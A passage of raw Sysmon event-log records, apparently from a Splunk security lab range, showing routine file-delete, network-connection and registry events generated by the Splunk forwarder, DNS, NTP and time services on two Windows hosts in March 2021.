Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A2E7BC61397395CD035AF06B00A01972,SHA256=19B1B27C936FCEE02BCA4FC8EEDE950500EC874BF0D28707EF84646740E74227,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246281Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:32.379{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28946AF8594E659A9110959F2458DDC4,SHA256=CEDDDF89A7E501C8F16D0C1E282E4AC4A17080D28A9302575697350DD6B9A85B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246280Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:32.019{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9452A7DBA5B01D35E218A59CA532FB12,SHA256=570F879CA99863C4C36AC8C097E0A4CC9C035E7519A8C72B348269B7B35E779C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061493Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:29.833{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54836-false10.0.1.12-8000- 354300x8000000000000000246284Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:31.656{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64805-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246283Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:33.035{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=759022447D2A944D82205EE7364B11E4,SHA256=753F4E12C6EE806702A95EA83B03AA799DEBE0CA6397EFB0C57C593EA844289B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061494Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:34.078{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5FA7A363AE30ED5FE67A403019999BE,SHA256=A539199B30B4DD2F04A0D13982A68A43E53FB9FF45C9B4A951FA72F3B9A8CABF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246285Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:34.035{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB5ABC5307D8B04BC740D94501A0C8D6,SHA256=0CE269F5EEC73DAC867A6DDBB918B45A36032D971EFD01C2E84CFA333E3A1E1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061495Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:35.437{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C4B519AF3E791EEE6E05BC6A813E900,SHA256=7B41867F999161A49DC35BA410E9DCA03B694E0AC441A048827E99B52433B4DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246286Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:35.035{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AB90DC8935A472A58A4BA9E7477F690,SHA256=2F34FE5A07A970DBF964FCEE2B0628312FB899A006BBB833057660FB4FD8AAE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061496Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:36.797{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C8E23D36469B1A5CF1756DB6CED8A68,SHA256=B6194F47A540B3926169D97A8D9E4C5C5B8039A96BF7CF992A58B8B7E25697F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246287Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:36.066{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6F2CD35F25D254847EB46440876770C,SHA256=BA80264A52DC176362E6FE09408E50E21BB210570B5980D662A041851072C1F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246288Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:37.066{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA70C1ED83E4D13854BBA7113F8B01CC,SHA256=68C03E872FC902B1349AD833655DBABC38696876A9A45E41D5ECDF4A3628BFAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061500Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:38.844{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89688A8470EBBF2EE9FA6F2D3464254E,SHA256=766930C44A3DD30A62DA7348A68B29920E9ECFC5C32BC410099FDAFEEEEE7D5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061499Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:38.516{7F8C56E7-4F98-6063-D400-00000000AF01}3720ATTACKRANGE\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\3720.xml~RF10637e.TMPMD5=2A60D97C76F5CF2752AED82FAD0227B8,SHA256=69E369B0D3268BE891A2A7995B65D940CB8412510DCA4E2AFE7DA6E57A8CF59A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061498Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:34.958{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54837-false10.0.1.12-8000- 23542300x80000000000000001061497Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:38.156{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D6CFF6F02BA0B6F800A98B4A45A86F9,SHA256=D98B899933C9E54807D9BEECCEE78440DECD58A87C20DBDDF2E8154FDFAA7A30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246292Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:38.457{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=312F18F6A438BB4C25E27EC39EDA5C88,SHA256=EDE6540BA6983E6674789714626BE703C67C0301674DD8E86CA8F52399F4DAF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246291Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:38.457{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A2E7BC61397395CD035AF06B00A01972,SHA256=19B1B27C936FCEE02BCA4FC8EEDE950500EC874BF0D28707EF84646740E74227,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246290Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:37.671{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64806-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246289Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:38.082{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DA27FC46D482FFC753ADDC3417D8F5A,SHA256=E6BCAEFD25FCB6EE27C9A6D091CD96FACF948C28BB3D5C080C6EF4231BBFF445,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061501Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:39.516{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C6E48A3E46A65B15CFB0BBCB071844B,SHA256=1DCDAF5C95E34E8BE85FCE4F0A42C8684D469292E1AA44F67DE565B5227BED3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246293Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:39.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D23B87DFC8561F6E4A58B8CB58DDB0A,SHA256=85382BA89EE92455A4AFDA995743F12B92C1DE837913DDD40C1E01389F1D93CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061503Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:40.875{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=352BE98EF28C1F1E8AA31D021F1877E4,SHA256=170269B58D2253BB688732EDD8382EF83317DD5EE5E0604D392CA149C96AA330,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001061502Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:31:40.031{7F8C56E7-4E3C-6063-1000-00000000AF01}100C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72582-0x2957e1ea) 23542300x8000000000000000246294Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:40.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13586075889F91D960A8AAD4487782A4,SHA256=78A9D38215858F4FFDA7856DE1778A0D51E74C692188BE807952D1BF0C82FCE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061505Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:41.547{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=2B71D42028379FF9D8A2C4E877830A34,SHA256=DF2F1C5D9D09AF7A2A35AC679DD89E7D62CA98093D02D2CFEB34B169A1ED6C78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061504Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:41.547{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B5B3382EEDE8BF2FA9D5CDBB43BFE30E,SHA256=0F1306B85AB1453B9C0E3934C33C81060E5E65D756DDC657D4F22DDD7D546336,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246295Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:41.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=088219CC4EF441C17B14982CC60941C6,SHA256=B7F27EC7A7AC30247A83DCA08BDE00DF32D33509939C4ADEDC21262E59E1051F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061507Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:38.833{7F8C56E7-4E3C-6063-1000-00000000AF01}100C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-877.attackrange.local123ntpfalse169.254.169.123-123ntp 23542300x80000000000000001061506Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:42.235{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=619A139CC5F87A541B9B0CF12713B835,SHA256=755B8535B0A910F45F9517831375CE72AF7FE5EF0CDA6C233A8B25AB931B5E88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246296Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:42.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00057F5DC95FFFB31052E5D301C3DD5E,SHA256=3D0032F7FF2B476E0734AF2C4C7C6C0C08FB5E40621931A6C616EACFF67F8EC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061509Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:43.610{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A0F6CF9A59701EFC4ED83103C4D5125,SHA256=5E6AA828DC775AE9658FB9D69F39B95FC83E0A958FCD0BA5E0F9D3742E0705E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061508Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:40.911{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54838-false10.0.1.12-8000- 23542300x8000000000000000246297Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:43.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF65327ECFBCB946E7812A25799B543F,SHA256=4807EB9E212B9549221D1D7330A2F7C0FAC064ACAD83249151C3E3595D5C9814,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061512Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:44.985{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B1E29DD0F01A365074804B0C15DCEA5,SHA256=659B2198636DECC02FA964C6724F3BF9242434CA5ECE4C00BAB45D6C2491D026,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061511Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:40.991{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-877.attackrange.local62344-false10.0.0.2ip-10-0-0-2.us-west-2.compute.internal53domain 354300x80000000000000001061510Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:40.991{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local56622- 354300x8000000000000000246301Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:43.499{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64807-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246300Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:44.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FDF9EF583CACCE2AB08F5981585278F9,SHA256=D8D87C44DC411F71A503CEEFB0B90F830A737AA40C1F0E2329295E82D8B9D41E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246299Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:44.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=312F18F6A438BB4C25E27EC39EDA5C88,SHA256=EDE6540BA6983E6674789714626BE703C67C0301674DD8E86CA8F52399F4DAF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246298Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:44.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DF1E90D78AC90914A75FEB1DA107BA3,SHA256=B2EADC22BF4A528615D2007A2CFBC956EE434A7DA0C1542E0FCB99238FAB900C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061513Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:45.657{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46D28E6BA5E9F82F952A2452F365BD40,SHA256=98B18BAAF856CC85C3D218A2C94F03B808AD4D6B6740F5281223A0E6E2FDFF29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246302Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:45.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B922C76B1BDE92C487ACB69E1116AB5E,SHA256=F0D18A474C5BD6A216A39426082D3E203305CED1D061528BBC06A170D197998A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246303Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:46.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79E9948992E9C0BFDF9258BE2C8F4B2C,SHA256=4B823BB4B533D0B28C1C7FE8560C1FB68A43F93879F0B3803F1E685C42A8CA81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061515Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:47.704{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A95A6145AE3457EB37F99871122005BF,SHA256=E7637B8957E7C7C6B067258A8BA1D1B301BA99F65C7B55A15FCB23C2858EA924,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061514Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:47.016{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEDF17E922DB43CD6454FD5B85AF9E73,SHA256=F3105320DC95E082F1C0C164BC10243127806D365CCF615EB24AF3242ECA0B62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246304Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:47.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7AFDA1AAF5B2CA53B4050D8608A5019,SHA256=ED93F40B73954A751F98E6E311BDB222FF69EB7F7AE52AB47B5A80BCD2EDB42B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061516Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:48.392{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86BF6A00F711B0A5796AD481AAA18551,SHA256=A96B521BD2049F46AAFBB479D40D7BA01C133A342CE593645F0B4F094E68EEF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246305Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:48.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DDD72EB2E27AD58464DB68EBD132355,SHA256=62B1269DB2F5A23D5E09F1D3293C825293D7CBA844AC2DDD9D6726ACDA548BCE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061517Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:46.021{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54839-false10.0.1.12-8000- 23542300x8000000000000000246306Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:49.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01970FAC18F062F009A75BAD4FE4ADA3,SHA256=3C6D452CE8C8E57334D70F07B2473B7452F5FED78FBE93904EFCF5C432B67261,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061518Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:50.251{7F8C56E7-4E3C-6063-1100-00000000AF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=459E0B55FEFDAD169D84280FEF3DABC6,SHA256=53D292C7E8CDC0D1B1E6172C893F4DFAA55BB25B5EB7A0CC8EEFBEA995047763,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000246320Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:31:50.816{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000246319Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 